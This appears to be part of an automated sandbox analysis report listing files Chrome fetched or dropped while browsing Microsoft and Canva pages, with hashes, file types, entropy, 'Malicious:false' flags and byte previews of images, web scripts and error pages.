                                                                                                                                                              SHA-256:E3DFD963EE84FC03522D91D34FF6FD73D0A91BD3B58A62AF405AAF1C85821ED3
                                                                                                                                                              SHA-512:F66196A08C736908C698CD3E15A6A903F387A6354F8148C5DFD774990770752E23030BD2EE40DEC5E675B96D0D326B6ECA7E1F3C943AF76FCC516276DCA57B4F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.4..WEBPVP8 t4.......*..&.>...B!."}...a--...?.VL.....@Y._.f'{.}..+.?........v..zb......e....R....~S.~............G...?..q^.|..o....p.......?..........'./....4?......W...G..............[..._..................k..._................./.....?....b.U.......'.?....;~c?........................+._.o...?..............O............._...~B.P.........x...k...E...o.......)..........#.K.'./..Z...+._..._.Z...#....._.?......W.O...._....;.....O....[..oFM..7.oP_M~;.C...?...................1...C......?......)...g.?........i.?...?.....[.........?...v.-.........?....!....._...1~c.........?......................;.+.......~..j?........L.8..>...O..l.MSj....h.e.5..9..w...H.N..0U.[/1.W.......+..tz..[.d...!.Sj.-..7|.MSj...6....S..v..(.,mL<v...;.Q.t..o...K.Z.a...U.=:.d.w....T..A..mT.R..(...v..4'l........].|bJ..H`..Y.*....p.....>...O..l.MS`d..T.l..S..?.K...X...c..c.......aMT:$....@.x>...O..l.MSj...iG.....x..I4...{.......Z..<.g....w..q..MSj...6....S.n..../I...w..W..R.m..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):184792
                                                                                                                                                              Entropy (8bit):7.998653635761141
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7AB82A86BCC5158DDD0570E4328EEA4B
                                                                                                                                                              SHA1:4DD61FDBCF0E2EF34B1A8583EA759AE31A0BAB30
                                                                                                                                                              SHA-256:6DA30307215A053E05E8917EB70EE770D7305233B07C2E093CC6042FE9E16341
                                                                                                                                                              SHA-512:661EA426A44C4832090C7CE1A95F4CE87141D43FF2D203D3A2C7ADE839ABA01516B980FAED4867BF166CB9D5C1AD305179DDF2903CA364605E82BF9B9EFA1853
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 ....0....*..&.>...A..Z...a,.s9K.3)...).....0._..6.v...1........z..+.....?.~Wx..?6......._.~z.o..bxW.............K.o......7....7.....?.?.?............_....s.......c................k.....o._............_.?......a.w....................=._.7......}..4.....k...G........G?.?........W.c...?...o.................o........q.....W...O.................O...~...~..............i...Y...?..}.=.{....................../....!..?..s...C...............?..........?......F.z.....;...o._..b...k..............].I.;...W.../........W.....?..W.....O.'....T..................?.G.g.................m...Q...o....o._..............O......3...G..........w..............3..............k.u....._....._..H?.?........lU.rd..aI.....R..DDDDDD".@....I.5.....R.t;......qm.{<C.....V.d....i5..Y..(_.m.>........_.r2.:......)v..-..........h.p.'P..0.`..N.....6....@.#B""....Z.{.-..Wc...^6.....a..F....t....R..DDDDDDDDDC....:o.#..qJ...O.4.....}.p.....9.ZY.......o...P..-W.....I/.g}1\
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (23310), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):23774
                                                                                                                                                              Entropy (8bit):5.769264661946586
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5CF215FB8FBE4EAD501E0B4ECD828948
                                                                                                                                                              SHA1:D91D2EFB6799B04B099F27888CD9F6678D439C2D
                                                                                                                                                              SHA-256:BA8A62C0049A09E95D7010653821477F7E774E2C2759DC4402ED77BE6270CA2C
                                                                                                                                                              SHA-512:0A2393041241D7793AAB2157C2F1FE0E004700549C1A65DC5A66221BF09901A4EA9FCA03627CAD8D5A4C75B116F804D39E9FCC7835DF84EF47C8C6291ED76EAA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://fpt.microsoft.com/tags?session_id=2ffe23f1-4f7c-4685-b828-1a1d4faf3a50
                                                                                                                                                              Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>.. <script>var localTarget='https://fpt.microsoft.com/',target='https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&',txnId='2ffe23f1-4f7c-4685-b828-1a1d4faf3a50',ticks='8DD1BC3D02DCEEC',rid='09a13d5c-1ee6-45cd-8ee3-1eab5b31098b',authKey='H3ihr9e92IdW6yd1ZgQ9S0kvtvZRuOxcpRCTIW%252fmvgzPmOTzDGLtXNaFks8zi1lqetJ1JrOoD3AeO8pqNYloWv7myLZ1kVWGalxnXkrL%252fVZjMSGkTM4aFNu7WBWkbh2%252bwd3tVCETwfwWcMphe2JkURWwys9BamVd9ShUYk%252bt3CeXV6psJtRLOciJVUO8hGcUy89pO15d%252fFhaUaAZWhxAILkNS%252fgCDSm6XgEnDqXEgLBedpxtnYicxr4bquBdQGEBORHMeuk3K5qUSCt4CY5YUVY%252foXf%252fhBGIHR2diFHxwtXVBpM7yy6026%252f6AAik8Ipb',cid='02C58649-E822-405B-B6C3-17A7509D2FCC',assessment='',waitresponse=false,bbwait=false,commonquery='',lsInfo=true,splitFonts=false,noFonts=false,UCH=true,PTO=100,rticks=1734128198171,ipv6Url='https://fpt6.microsoft.com/probe?session_id=2ffe23f1-4f7c-4685-b828-1a1d4faf3a50&instanceId=02C58649-E822-405B-B
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1238
                                                                                                                                                              Entropy (8bit):7.762139796417613
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E206A414839ECEFD736493FB77DEDEDD
                                                                                                                                                              SHA1:204FD11DCEA0FDD54A6547F6093E675691DD5E01
                                                                                                                                                              SHA-256:A12055D52F7150061AF6075F344857C1B52CB5DA70CB1A5DA5E515F9ED2E88F3
                                                                                                                                                              SHA-512:05FFF8E484715F56FBB3FD46D18C52B0C8050AE9E3E8D30C1DA59B521E634BA45B37947A94C7FABDEC05EC1CA4CE228FD49F234AF43B082A703BC188DBE78DC8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8L..../_....Em.1....#..".?..F..@}...lj.UU-.,Fz.IZ.i#....|y.i.}....$........I..m./c..........\._:...~..p..^........U..<...$Yu.33...o....b.Qf<....LQ.$I.$./3...{.|Wit.m[.'...$...V...R%P1...;..6`... ..P.;....1...[...3.....##Xpd.....#...#..;....N#_c.K.|..~..|..b?.#....Y.....Y.W.......3)$.A.p...._.../.....\.pd8.N......|z..'............$......../.p]..:....U...-6..j.*4.....W*.(iR..(.!..J!U..l..D..$. V...JR,...z.....J.+9.EE5P.&...?..Ah5T.;.>..!-......Z)A.(....]w..7.&a...x..A.(.....S..0...o/....N1.F.P...Z% ..lR......(4*.W:.H.J......jR...J.....@b&PRD.... ..d#.3....F.2..(.ImY3...(.5BM...TNb....1#M1.&i.2.....^4...... EZC.j.. "6..........'.a.._..o.}~......a.(E..?].q...ImM......7.....2i.*M...D..N[....,.6tH...>=...jZ=.A.\...k.CS.LM0J8;.Sh..jZ..JJY 2l.0)5..J..jJ#.Z.%.%.@N.(M)E`@.e.4.4...z.....1..!.)..Uk5=D5ATJ. .Fb41.. ..F.5e.Xa...l...Tg..FR%fb.f`.Ih.Q6..0#...1.. .@.....Z......*...L.h& .H..8.n.i..$3...&1..0....$.d.v.;.....$%..)...`...D%.lPC-....FC..cb..D....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):111448
                                                                                                                                                              Entropy (8bit):7.996899816962474
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:30F901DB9A64196BA5C389D27718765B
                                                                                                                                                              SHA1:4624D5B82F07D8E8B539C84AA0741C64ACFD3EF2
                                                                                                                                                              SHA-256:2A0A523403DCA171A6F86567A9342A1C88684763572D611506CCFD804EF8CEC9
                                                                                                                                                              SHA-512:6B2BEC7C0B8A1563A7B6B980379F8C1D58B6415C77F89BA52234A4A3E6F03598C099D41258186AA01353B2F4D5F30613FB718CF4C5584B51117F854E4500A789
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFFP...WEBPVP8X...........%..ALPH......p.....h.....E....s.................................................................................................................................................................(.VP8 r........*..&.>...A......Q--...M........-O..T.......S.q&.}...d......M.....?%...............F.../.{....g./.....f.............Y...k..._......{.R.......G........?........o.......).r............}......M...W...............o./.../..d....}....Q.......s.?.g.....O.......~...~..'..._.o.?..?..._.=.?....D................O..._......{.Z.........|.........c...C.o....q...7.%...7.._F...7.......>..o..........o.8...w.......`.....q.....?.?.?....I...)....'.;.?.......N...3..._...=.?w.......'....F.............?.?..W.....G.....~..i.........~.............?...............?......7......s.U......._...~....c...G................W../../....._....}....B....z../....V.q.........G....1....2+W.....L.I.....UA.r.....v...e.-.^......z.-..Kt....-..J.j..^..k...X....=
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5082
                                                                                                                                                              Entropy (8bit):7.937817715649004
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:05BD2EE233C6C201DA81D649A59150AF
                                                                                                                                                              SHA1:87B35318D8BD0D1630ED593FEECC9A5496C96892
                                                                                                                                                              SHA-256:4ADF8332905BAE6542BE945A04F58BBA064F2CD29B699EFF005B124891B862AB
                                                                                                                                                              SHA-512:3CD0E6D1EDA8412BF02E7AC121395E30C8F1987B7A9AC098C2B3019FBCAAF76E3A61A31C1C98EB771CC473D07874CCD0524BF386A59E71C6B1C11B678C65F8D1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8X........t..'..ALPH#..........i...c..........@sy......v...VP8 ....Pa...*u.(.>...B!..5...a,....#S....G...Eo.....*#..'..R......................w...S......`....................._Y..>.^......L.....Y..._...../..._..?.@=.:..W......._.............M....C...w.....o..............$...../....Vo...l.....P/N>=.......o..l....Q.....9........._.?.x.yG.'......~....U........~..,........./..........#..._.?`..^..Ao..vAT..B. .mT..f.U6.|P.n.*.U>&.O..m..T.j.j...B.!.L j.U>(Y.z6.qM...,......U.,.|P.n.+...s..v.`O%Zt..(.)N...R.rW....p._.Y.:u..ZG.....B....\.AF~svw0.3.L..F...-.p..QCT.J+..J+n.E..#>v......~#.........A..........J..R.....h.T.f]"._...{(.I..&"K...G..}H.....j.Mr.9.~.=.....}&6.s0....t'V...9+%B../.Ls.W.F9#. .C.....)T.."..N.'...i...........$BA.........S..MM..T..B......mT..f....6.|P.n...P....7.p^......|P.n.*.U>(Y.d.M...,....O..m..R.....v...V......7.k.*[R...ju.$....."Qc$..0....X.g* ..,/....1.3v.J..........p.O.\..>{?.......d.5o..B.`d..8.......>..J.M....x..}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):548
                                                                                                                                                              Entropy (8bit):4.660801881684815
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                                                                              SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                                                                              SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                                                                              SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):17174
                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):124978
                                                                                                                                                              Entropy (8bit):7.996787025840353
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A1EA82042E41112627BCE03878DA793B
                                                                                                                                                              SHA1:491D80AEBE57AEC918B306037DDF658721034E3D
                                                                                                                                                              SHA-256:1C6D8110D85E7A5D0D075434D51B5951BCEE5B291DD0CE204BAACA4A0258CF99
                                                                                                                                                              SHA-512:32D8CA277FF02D752CD01A5F82B0850821B09EB13E134189195C64801B4C7F29D6B998974C77046BB4020D8668745798938BBF9FC027782C4A413F48E8B9537F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF*...WEBPVP8 .....x...*..&....%..siq~[.......i.s..oi.Ia...'..O.;$.F%.>....Z.......Y...-.RzE.....I....?.....?.......?..|.......g..................P_._.~@.9........^....y.'.K...../......c.Y..........`.....a.g.....o.....?............._.?......e...a.............?..s?..g>........P?....'............?..c.s.9....r.`.O......k.1........u...#.!........f.;...#....._........W.a.o...........O..?....V...~..Y.....W...G......P.....#.../..I.~.[..............s...k.W................?...C~{........?...._...7...O......e...w....../.?...?.....?.}.....OPd..1..1..1..1..%[...S....K......0....i.9......).^.67~.g...s..Q.....K..P.8.....%.......{.0.i..~/jFI.....(..}...9V..yH.@..h2x.h..h..h..h....f.)...`n..W...F.../..Q.. Rn.k..[`.p........>d.z.s..U^7.$.mu+.'.Hi.t......!Z.....M.p..iRft.L.=:1.'.6..6..6..6..rT....4..<.0.P..3..W....:.|.E2.2.~9xM..'m2onN.f].YF.......I.......|D..7.2."....OU.7.]?_..3O=.D..h..h..h..h..V.....X.......1.X...%.J.....0.w.>>P..6...=]Z!.wRR4.b.RL...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65455)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):118053
                                                                                                                                                              Entropy (8bit):5.459504030528035
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3EC6F36D1C8C25B3CCE29C3D8828593C
                                                                                                                                                              SHA1:A73EEF770AAA46A273FFD344868ED0B1F6460873
                                                                                                                                                              SHA-256:AB4CFC6B30F1071F7D3E001E1390CD86B5A6F1DDA26EA32176C15B4EC5D74430
                                                                                                                                                              SHA-512:3A3C52D92D7B87DB926E7456D3E6814931F277FE06F7620ADC792ED0D11407F966314263E61BA45235CF204FF358A38C7D495FC07EDAA5996E3098D3665CFBB9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/9b23e962866ce10c.vendor.js
                                                                                                                                                              Preview:/*! For license information please see 9b23e962866ce10c.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{23278:(e,t,n)=>{"use strict";function r(e,t){var n=t&&t.cache?t.cache:c,r=t&&t.serializer?t.serializer:l;return(t&&t.strategy?t.strategy:a)(e,{cache:n,serializer:r})}function o(e,t,n,r){var o,i=null==(o=r)||"number"==typeof o||"boolean"==typeof o?r:n(r),s=t.get(i);return void 0===s&&(s=e.call(this,r),t.set(i,s)),s}function i(e,t,n){var r=Array.prototype.slice.call(arguments,3),o=n(r),i=t.get(o);return void 0===i&&(i=e.apply(this,r),t.set(o,i)),i}function s(e,t,n,r,o){return n.bind(t,e,r,o)}function a(e,t){return s(e,this,1===e.length?o:i,t.cache.create(),t.serializer)}n.d(t,{A:()=>h,H:()=>r});var l=function(){return JSON.stringify(arguments)};function u(){this.cache=Object.create(null)}u.prototype.get=function(e){return this.cache[e]},u.prototype.set=function(e,t){this.cache[e]=t};var c={create:function(){return new u}},h={variadic
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):136756
                                                                                                                                                              Entropy (8bit):7.996648147400782
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:80D09C6582683AF4791B537355B250D1
                                                                                                                                                              SHA1:120C45E92460FD8B6EC7CACC1E08EE2F323ED7D2
                                                                                                                                                              SHA-256:A6E8A4E969F511D641B99C743E627F1406B8C93F159104D0BA3B582C03626D00
                                                                                                                                                              SHA-512:38354033EE2EDB96C357440C31E4530F946E51DD3AC2DBF02B623A732046AA7E258B12BAA946216AE8D06259ECF3F8C5BBA321F991F9CC4D408B41A4D35CA1C9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF,...WEBPVP8 ...P....*..&.>...A..(.&X...Y.........$.......S...%...t.......Y...*.......{...."...?.....CJ.!......hg?..7...w.7.f..g....}?..g...y.=.......?..%.q.o.o.?................p.......s........._........W......./.....l..._...O..?.~.~......;.....W.......s.;.g.......o.......~........}.....g.../..............S...G...O.O._....................?..............7.../...o.....~....G.......?*..............5...=.../.o.?........./.^.?.#=..%.C.?....s...w...O....|......._..0.u.~...?.../......Y...........?..p..."........).....g.?..k.'...?....V?7.....o......w...'...w.o........k.....7..._}...E.g._........o.?.....?...s......._................?.~1~i...G.?...?....o...[.?.O.....p........7...O.o.?._E..?y........?..E.2l@'d......P..Q.T.......s.._Yz.=>..2l@'d....;...i.,......p..3......j.A.],GJ..F.,.|_..Q..o..pj.... .u..}.....f.O.....Z...3hR<...{...pSJa..s.,].F.....h.^.|.G=....gS....T.<........f....{g....8p..2..ICL.4...~(..P.h.2....P..E..K../4..vf..4..?..'C.M|a
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):539663
                                                                                                                                                              Entropy (8bit):5.498632862402153
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3807BC584F85B668CEFC639F73CFF225
                                                                                                                                                              SHA1:CF1640047B854F668CF7AAD8637A376AEEDBFE2B
                                                                                                                                                              SHA-256:7E7ACABD4A446AF2FCCA9F8D331C77B5659C0601AD7421E2A5DC24A7DDE0BEAB
                                                                                                                                                              SHA-512:CF963156B22553DFC480C5A17C3C22719C885FBDBC2BC58F8BA1622A3B17337CAEBEBE24813E1829335FAEA8A30251AFFEDFD6B4A85464300605F6C48184BCA3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lpTag.callback({"taglets":[{"name":"lpSecureStorage","type":0},{"name":"lp_testingTool","type":0},{"name":"lp_sdes","type":0},{"name":"cobrowse","type":0},{"name":"scraper","type":0},{"name":"lp_ada_enhancements","type":0,"parameters":[{"id":"enhancements","value":"{\"options\":{\"debug\":\"false\"},\"logoCSSFix\":true,\"surveyTabFix\":true,\"headerTextCSSFix\":true,\"menuKeyCloseFix\":true,\"minMaxRoleFix\":true,\"agentIsTypingFix\":true,\"offlineCSSFix\":true,\"inviteKeyCloseFix\":true,\"offlineWindowNarratorFix\":true,\"cancelBtnCSSFix\":true,\"muteBtnNarratorStateFix\":true,\"engagementFix\":true,\"overrideStyles\":{\"cancelBtnCSSFix\":\"color: #000 !important; background: #fff !important;}#lpChatButton a:focus,#lpChat a:focus, #lpChat button:focus, #lpChat input:focus, #lpChat textarea:focus, #lpChat select:focus, #lpChat .lp_textarea_field:focus, .lp_confirm_button:focus, .lp_cancel_button:focus, .lp_action_item:focus, .lp_dialog_input:focus {outline: #000000 dashed 1px !importan
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (590)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1716
                                                                                                                                                              Entropy (8bit):5.2304068952006615
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                                              SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                                              SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                                              SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                                                                                                              Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):72
                                                                                                                                                              Entropy (8bit):4.241202481433726
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (21562)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):21709
                                                                                                                                                              Entropy (8bit):5.093673138139244
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:6A8BFF4EF72D882FF51F8570BEF01E43
                                                                                                                                                              SHA1:89EAF02849614FBD4736D6BF4C4BDAA4C7A58C3B
                                                                                                                                                              SHA-256:A6917CAA80523B5EBDD6AED706A2DB8542B70CD7D6B2166E3B8DFEE0BD3C9457
                                                                                                                                                              SHA-512:3D6B78A783059F73418DC87156CDEFFC0E0F36BEA154DAB384DB0D1C5014341175F631C280116C2BAE55BB97ABEC6406AF115EBEEBCDD972E839B669645B8B42
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC82b2c8c298654e17859974fddee31855-source.min.js
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC82b2c8c298654e17859974fddee31855-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC82b2c8c298654e17859974fddee31855-source.min.js', "var ruleCorrelationGuid=\"KIF-9a6a4551-d7ca-492e-83b8-a679497175ba\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),window.oa=window.oa||{},window.oa.enrichments=window.oa.enrichments||[],window.oa.enrichments.skus_global={\"146517a0-188f-42c7-962c-c58974af30df\":{fwlink_id:[\"403805\"],wildcard:\"false\",impact_radius:\"yes\",offer_prod_full_name:\"exchange online (plan 1)\",offer_license_type:\"subscription\"},\"a8592538-ec4a-4e56-ae48-20d17998cd20\":{fwlink_id:[\"403806\"],wildcard:\"false\",impact_radius:\"yes\",offer_prod_full_name:\"exchange online (plan 2)\",offer_license_type:\"subscription\"},\"28504f49-3a7d-4f0f-8cfb-0febc4092c0a\":{fwlink_id:[\"403828\"],wildcard:\"false\",
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1044
                                                                                                                                                              Entropy (8bit):4.17745527598802
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E03FF2548A6DFDFA7057DEEB6A23576C
                                                                                                                                                              SHA1:4946633005322363C6185C176348B97B36006A6B
                                                                                                                                                              SHA-256:B3A459332B47DD0E757B1FF74AF0E3A062F5B534EB62EA81DD2E818A8BDCA2BC
                                                                                                                                                              SHA-512:D81F2E66BCAE78835746A1297AD2910F92E501093B5B563F29628C79E2821C4B3ED103125B9609A9F7870D3939992F9CCB9398002D77408B9B25A8F4E0E8F8B8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Data-Card1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
